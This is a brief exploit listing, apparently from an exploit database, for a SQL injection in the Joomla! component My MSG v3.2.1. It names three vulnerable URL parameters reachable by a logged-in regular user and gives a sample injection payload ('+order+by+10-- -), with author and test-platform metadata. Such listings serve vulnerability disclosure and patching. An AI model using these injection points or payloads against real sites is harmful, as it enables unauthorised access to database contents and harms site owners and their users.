# # # # # # Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection # Google Dork: N/A # Date: 25.02.2017 # Vendor Homepage: https://www.cmsplugin.com/ # Software : https://www.cmsplugin.com/products/components/10-my-msg # Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg # Version: 3.2.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL] # http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL] # http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL] # '+order+by+10-- - # Etc... # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-28]